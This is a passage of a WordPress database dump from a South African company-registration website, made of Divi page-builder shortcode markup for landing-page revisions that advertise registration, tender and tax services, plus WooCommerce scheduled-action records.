header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Maintaining Your Company','','inherit','closed','closed','','32724-revision-v1','','','2019-08-14 11:07:36','2019-08-14 09:07:36','',32724,'https://companyregistration.online/32724-revision-v1/',0,'revision','',0),(32777,3,'2019-08-15 11:31:56','2019-08-15 09:31:56','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row _builder_version=\"3.26.6\" column_structure=\"2_3,1_3\"][et_pb_column _builder_version=\"3.26.6\" type=\"2_3\"][et_pb_shop _builder_version=\"3.26.6\" type=\"product_category\" include_categories=\"8,7,17\" posts_number=\"4\"][/et_pb_shop][/et_pb_column][et_pb_column _builder_version=\"3.26.6\" type=\"1_3\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 11:31:56','2019-08-15 09:31:56','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32787,0,'2019-08-15 11:16:25','2019-08-15 11:16:25','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d553f12bc19a7.28514395-wpJ0psAaYeIEJdd7jUz3Szr2SBBuKy8n','','','2019-08-15 13:16:34','2019-08-15 11:16:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32787',0,'scheduled-action','',3),(32798,0,'2019-08-15 12:16:34','2019-08-15 12:16:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5550bbc60b18.17416754-HP2mVSQrEbezIED3Mn8b0BqX1yCIZw4E','','','2019-08-15 14:31:55','2019-08-15 12:31:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32798',0,'scheduled-action','',3),(32799,0,'2019-08-15 12:16:34','2019-08-15 12:16:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5550bbee6965.43474037-11yntlySwD7k5eNS35t2noTLkY3wxqfS','','','2019-08-15 14:31:55','2019-08-15 12:31:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32799',0,'scheduled-action','',3),(32800,0,'2019-08-15 13:31:55','2019-08-15 13:31:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d555ee8d571f9.23697625-d27Sfx7MmGapaoDvmZXfZtSjTkIRt6uB','','','2019-08-15 15:32:24','2019-08-15 13:32:24','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32800',0,'scheduled-action','',3),(32801,0,'2019-08-15 13:31:56','2019-08-15 13:31:56','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d555ee8eb6126.38429640-OFH9vYym27ejHnBRrWYIiB1HWVkSaYWX','','','2019-08-15 15:32:24','2019-08-15 13:32:24','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32801',0,'scheduled-action','',3),(32779,3,'2019-08-15 11:40:57','2019-08-15 09:40:57','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" 